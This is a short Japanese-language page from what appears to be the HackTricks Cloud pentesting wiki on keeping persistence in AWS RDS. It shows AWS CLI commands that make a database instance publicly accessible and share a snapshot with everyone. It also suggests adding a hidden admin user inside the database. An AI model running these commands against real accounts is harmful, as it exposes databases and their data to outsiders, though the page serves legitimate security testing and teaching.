Files
hacktricks-cloud/src/pentesting-cloud/aws-security/aws-persistence/aws-rds-persistence/README.md

1020 B

AWS - RDS Persistence

{{#include ../../../../banners/hacktricks-training.md}}

RDS

詳細は以下を参照:

{{#ref}} ../../aws-services/aws-relational-database-rds-enum.md {{#endref}}

インスタンスをパブリックに公開する: rds:ModifyDBInstance

この権限を持つ攻撃者は 既存の RDS インスタンスを変更して公開アクセスを有効にすることができます

aws rds modify-db-instance --db-instance-identifier target-instance --publicly-accessible --apply-immediately

DB内に管理者ユーザーを作成する

攻撃者は単にDB内にユーザーを作成することで、マスターユーザーのパスワードが変更されてもデータベースへのアクセスを失わない

スナップショットを公開する

aws rds modify-db-snapshot-attribute --db-snapshot-identifier <snapshot-name> --attribute-name restore --values-to-add all

{{#include ../../../../banners/hacktricks-training.md}}